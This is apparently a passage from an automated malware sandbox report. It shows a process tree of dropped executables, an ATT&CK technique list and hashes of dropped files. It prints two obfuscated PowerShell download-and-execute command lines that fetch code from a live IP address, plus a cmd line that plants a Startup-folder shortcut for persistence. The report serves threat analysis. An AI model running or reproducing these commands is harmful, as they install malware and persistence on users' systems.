    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 316 -s 528
      4⤵
      Program crash
      PID:6428
- - C:\Users\Admin\AppData\Local\Temp\a\steamerx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\steamerx.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:7036
- - C:\Users\Admin\AppData\Local\Temp\a\justpoc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\justpoc.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5364
- - C:\Users\Admin\AppData\Local\Temp\a\Lumm.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Lumm.exe"
    3⤵
    PID:2932
- - C:\Users\Admin\AppData\Local\Temp\a\4.exe
    "C:\Users\Admin\AppData\Local\Temp\a\4.exe"
    3⤵
    PID:6644
- - C:\Users\Admin\AppData\Local\Temp\a\file.exe
    "C:\Users\Admin\AppData\Local\Temp\a\file.exe"
    3⤵
    PID:6244
  - - C:\Windows\SYSTEM32\wscript.exe
      "wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js
      4⤵
      PID:4656
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6888
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"
        6⤵
        
        PID:7008
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2588
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Drops startup file
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4892
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\file_87069\Installed.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1188
- C:\Windows\system32\mspaint.exe
  "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\file_87069\screenshot.png" /ForceBootstrapPaint3D
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:4192
- C:\Windows\SYSTEM32\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit
  2⤵
  - Drops startup file
  PID:1376

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5876

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:6068
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5296 -ip 5296
  2⤵
  PID:5064
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5296 -ip 5296
  2⤵
  PID:6268
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3368 -ip 3368
  2⤵
  PID:5220
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2808 -ip 2808
  2⤵
  PID:5532
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6976 -ip 6976
  2⤵
  PID:5780
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2400 -ip 2400
  2⤵
  PID:2408
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 316 -ip 316
  2⤵
  PID:2752

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:7088

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:4820

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:5976
- C:\Windows\system32\dashost.exe
  dashost.exe {3c100d32-c14e-41fc-a8f904eaaf5f16d1}
  2⤵
  PID:3604

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2176
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\Desktop\file_87069\screenshot.png"
  2⤵
  PID:6072
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\Desktop\file_87069\screenshot.png
    3⤵
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:1996
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f1f232c-9b38-43d6-9dae-e89d64384444} 1996 "\\.\pipe\gecko-crash-server-pipe.1996" gpu
      4⤵
      PID:1884
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2484 -parentBuildID 20240401114208 -prefsHandle 2408 -prefMapHandle 2416 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ca2bf85-4fe0-458a-a4f2-b5c7138261af} 1996 "\\.\pipe\gecko-crash-server-pipe.1996" socket
      4⤵
      Checks processor information in registry
      PID:6936
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2804 -childID 1 -isForBrowser -prefsHandle 3192 -prefMapHandle 3020 -prefsLen 24741 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4727e9cc-67f3-455e-9477-742119ae6652} 1996 "\\.\pipe\gecko-crash-server-pipe.1996" tab
      4⤵
      PID:1756
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2648 -childID 2 -isForBrowser -prefsHandle 3836 -prefMapHandle 3832 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {19f84b88-c5a2-4088-843a-4452a786c134} 1996 "\\.\pipe\gecko-crash-server-pipe.1996" tab
      4⤵
      PID:6796
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4524 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4484 -prefMapHandle 4428 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f20b19a4-4e95-48b6-8653-bc86b55d5237} 1996 "\\.\pipe\gecko-crash-server-pipe.1996" utility
      4⤵
      Checks processor information in registry
      PID:6556
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 3 -isForBrowser -prefsHandle 5292 -prefMapHandle 5304 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e8d8cf2-b854-40bb-b64a-3d59c2ea51dd} 1996 "\\.\pipe\gecko-crash-server-pipe.1996" tab
      4⤵
      PID:5492
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5516 -childID 4 -isForBrowser -prefsHandle 5436 -prefMapHandle 5440 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a9de4e7-e8a1-4775-afe5-aaa1dde91d5a} 1996 "\\.\pipe\gecko-crash-server-pipe.1996" tab
      4⤵
      PID:6908
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5708 -childID 5 -isForBrowser -prefsHandle 5628 -prefMapHandle 5632 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d6f7d92-bf09-4edc-be38-92c64af74397} 1996 "\\.\pipe\gecko-crash-server-pipe.1996" tab
      4⤵
      PID:7040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\KKJJEBFCGDAK\CBFCFB

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\ProgramData\KKJJEBFCGDAK\HDGIJJ

Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
89b6feba6076daf099ac16e8b46fccfc

SHA1
7782be671f81d4c026b2ff063d2f97f07e1b3d88

SHA256
ff4c7614de997a51fa61903d24029e89f572cc59a55b7bc98b7552c4713ee6c9

SHA512
6eaad5e5febd48c1320d80d911a73435667ec525d77cb2dd6a978ec0f5ed0ead80d81c6150161f6712cea71763771bbb9e45c4becc37c6534ebfe523e59fedfa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d3e76506897bf04ce402a889d09d8042

SHA1
ed2d8e5cc43bd0c858b321a66f76d09545701501

SHA256
44c27fe570cdbc255eb7603bc7aeab724dc799c7d2b993191be82a7a20ed3e13

SHA512
d29ee04b034a52231353f510f1d45874aa110472a1b8e692205aff2d9084157afa39f4394722a64b44841234beea35450325b3db6ee599e93ef3685a756ce482

Download Submit
C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.scr

Filesize
1.0MB

MD5
c63860691927d62432750013b5a20f5f

SHA1
03678170aadf6bab2ac2b742f5ea2fd1b11feca3

SHA256
69d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353

SHA512
3357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
fdfd367381d542af402eb2d187193c94

SHA1
a0cd1b8fe4380704f9f8c2dffcfe958ffea1a6c7

SHA256
78d92d15e0234496de78be7552dfbe92bfe04ef2c7eb9a7c59083c6c136a8d2f

SHA512
0e599ea24288ad3afe4386f449624801f03173c255316dc75230ce069cb8477f0deda65a66e1a469e30fa185082296309101057b7277635bcf0f5484a0231660

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
34d2c4f40f47672ecdf6f66fea242f4a

SHA1
4bcad62542aeb44cae38a907d8b5a8604115ada2

SHA256
b214e3affb02a2ea4469a8bbdfa8a179e7cc57cababd83b4bafae9cdbe23fa33

SHA512
50fba54ec95d694211a005d0e3e6cf5b5677efa16989cbf854207a1a67e3a139f32b757c6f2ce824a48f621440b93fde60ad1dc790fcec4b76edddd0d92a75d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8749e21d9d0a17dac32d5aa2027f7a75

SHA1
a5d555f8b035c7938a4a864e89218c0402ab7cde

SHA256
915193bd331ee9ea7c750398a37fbb552b8c5a1d90edec6293688296bda6f304

SHA512
c645a41180ed01e854f197868283f9b40620dbbc813a1c122f6870db574ebc1c4917da4d320bdfd1cc67f23303a2c6d74e4f36dd9d3ffcfa92d3dfca3b7ca31a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ca49b4f3f03eae6f90cfb2c702283d4a

SHA1
5c43a627ed8ff02176e108b30b23b22479e0d919

SHA256
f9152663a9ea4fa07cddfa3dab33093b7100d05203c1bcd3c7f5038684672eea

SHA512
9cfb3056b95b2fbe4a8ede8630ee347f3c73fc45b6abcf5c86972769acdd09e84db7c4e006e8067637e27ad7661a5ed99040504491dc0dee7a2eb92adb9f230d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
90c3eaf851663f1c7260d6436cfa70aa

SHA1
568ac03d9003c56f31e6e23fea36419105954c35

SHA256
2e8d2fd639a279f33a6e13be6f612f6bb3de2daed3ee2b4826c18a8a8e7b6124

SHA512
bf6b9bed9a03e77f488474ba0c149ff99213fbc3e9d000545a9cd1f79c176996966522dd7e7abad6a8e1ba5c38c77a33e1b676447a1b0af9ffa09ed436ba6049

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\activity-stream.discovery_stream.json

Filesize
22KB

MD5
2f72816aeacda98cbf7bcf0e76e4101f

SHA1
c741780e2b35aed4e303f4dad83b47fef042cd08

SHA256
6f194906f43d03d48d714fdaa3f93ea71a80d14ee43d2283a90149d06e77e84e

SHA512
62bfe33ea5bcd35851bcb9fd07d9e36746ce4de24856fd298ec355a4de579981e5d5f517b66b503099f56b35dd478b80a4f913e411b83d98f0b992c456981fac

Download Submit
C:\Users\Admin\AppData\Local\Temp\4582.vbs

Filesize
125B

MD5
8b4ed5c47fdddbeba260ef11cfca88c6

SHA1
868f11f8ed78ebe871f9da182d053f349834b017

SHA256
170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

SHA512
87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7910.vbs

Filesize
114B

MD5
34b33b5a437e20d03d79b62a797dfe99

SHA1
9b57b598a7e9d66157a05a44bc7c097bf5486e6c

SHA256
f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1

SHA512
757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\8053.vbs

Filesize
117B

MD5
bb8cfb89bce8af7384447115a115fb23

SHA1
6a0e728f4953128db9db52474ae5608ecee9c9c3

SHA256
d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485

SHA512
d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\chrome\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\Alfa\Extensions\chrome\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Bukkake.cmd

Filesize
33KB

MD5
8fe00be344a338f96b6d987c5c61022d

SHA1
978e4cf1ca900c32d67dde966d5b148d25cec310

SHA256
6b938320d9a1d9dc9ff337ec6c5284519ff1838bd1c7b5c0c1f093f0bba2d399

SHA512
216dd64298e1315d307072b557351ee06c949816f868153b178ecc1f809cd099aae7e90a9af4c1a6826e9315b7a35843e9b7121f89baccf4cedab754b51784e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nyt0snsa.dql.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\0fVlNye.exe

Filesize
4.2MB

MD5
978752b65601018ddd10636b648b8e65

SHA1
2c0e320cb0d84c6760a925d873d58e701e3e6cb1

SHA256
8bf64a9906e8177eab206dac3a550bc5918213659f98eac6295b8e24184eb782

SHA512
f29382d1c14cff16ee09febc5e3c875580de84494ba0510fcae06a1e024ffd00c96d3e962d2da2132ebd864d085218c79979c1df7f3334ea2e26b5ed39cbdbe1

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\333.exe

Filesize
243KB

MD5
b73ecb016b35d5b7acb91125924525e5

SHA1
37fe45c0a85900d869a41f996dd19949f78c4ec4

SHA256
b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d

SHA512
0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\4.exe

Filesize
7.2MB

MD5
4cf7ec59209b42a0bc261c8cc4e70a48

SHA1
415ec9061883da4cadb5251519079dfe59e0924a

SHA256
2e5e8a0087e49de9ba8df196bc71e3ac0d6c2ca6095ac3ff91205bd9d8eaf678

SHA512
de28c9871740577f89902b6e65c3dd00889dfcfcb3ce83fad05070761d1dc9ce4fe85f92e8443f80cf4869956a4f558b60b509302d38b1bc53b5b3536936e7d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\7mpPLxE.exe

Filesize
426KB

MD5
82bb7a2c4d05216ec5fc07aa20324bc1

SHA1
3f652844912f6c134c656da0ef35750c267016dd

SHA256
56e333f04b51aa90a9d086eb855ac51b23c19170f7989f770f6a56383cffe8f2

SHA512
efc991b07660b93c2562c58c91bb4ce1f8f907848e3f2ac4c45c80016025148877cf25df336afd041106fa35376ffe2868695c92d2c6f81ae107d16c7cdf051a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\9758xBqgE1azKnB.exe

Filesize
439KB

MD5
bf7866489443a237806a4d3d5701cdf3

SHA1
ffbe2847590e876892b41585784b40144c224160

SHA256
1070bf3c0f917624660bef57d24e6b2cf982dce067e95eb8a041586c0f41a095

SHA512
e9bb9d5157d2011eed5f5013af4145877e3237def266f2cc6fd769ed7065a4fa227f7d316de5fc7eeae8f3f852b685fb3cc166127f79134f1fa1a200b8c0c186

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe

Filesize
1.0MB

MD5
73507ed37d9fa2b2468f2a7077d6c682

SHA1
f4704970cedac462951aaf7cd11060885764fe21

SHA256
c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6

SHA512
3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\FaceBuild.exe

Filesize
9.3MB

MD5
d55a35cf27b971090b6bef17f5e75945

SHA1
10263fe2b4b921976eb77380eebc36a1f95521b8

SHA256
df0b6c507d2e16c5cac0ce6497fa707d815adc587c9acdeff897aaebaf2ad6c7

SHA512
90e5def9a431edf0855e155b15465170c19368d4068cb6bc616a463efa18625c3e964e970d6c9cf2c80e2b06d418a4816f95398fb79f7cb91ca8ea4b63fb8c5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\IMG001.exe

Filesize
3.4MB

MD5
d59e32eefe00e9bf9e0f5dafe68903fb

SHA1
99dc19e93978f7f2838c26f01bdb63ed2f16862b

SHA256
e06aa8ce984b22dd80a60c1f818b781b05d1c07facc91fec8637b312a728c145

SHA512
56a3790205885d12252109fdf040e5527fad8a11811e7471e7d406781c9bb4e3514b074daf933a3865de03f99cd13d93203d5478a69e87692cdd016741b73587

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\InstaIIer.exe

Filesize
41.0MB

MD5
136d8eeb91c5fa33ff2049b441929788

SHA1
58c0e21ec68c7c499b442c8ec2e820adf1fd15ec

SHA256
5667a73898a9134a736c6b56f25577ed3f9901dd17439de0dca545ac3cd1af16

SHA512
d55552584088455d96656d3ac7b33195cbf0eb511bec47da66f37ff5874fb489d69fa0eb9e1cccb3bdb431ceee835c2cb62833f420a8efcec4ee44439090a1fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Lumm.exe

Filesize
6.2MB

MD5
11c8962675b6d535c018a63be0821e4c

SHA1
a150fa871e10919a1d626ffe37b1a400142f452b

SHA256
421e36788bfcb4433178c657d49aa711446b3a783f7697a4d7d402a503c1f273

SHA512
3973c23fc652e82f2415ff81f2756b55e46c6807cc4a8c37e5e31009cec45ab47c5d4228c03b5e3a972cacd6547cf0d3273965f263b1b2d608af89f5be6e459a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\QjTnVG9.exe

Filesize
612B

MD5
e3eb0a1df437f3f97a64aca5952c8ea0

SHA1
7dd71afcfb14e105e80b0c0d7fce370a28a41f0a

SHA256
38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521

SHA512
43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\TikTok18.exe

Filesize
154KB

MD5
602876c49237a426d0e27ea8e6b1e0d6

SHA1
5c6ab956b9fe5be5d9cc6f5c58aa6bf90608e1d4

SHA256
851dbda100f272baabe3f7052989b4625595eefe165d3c5fda80d3ea9610ea11

SHA512
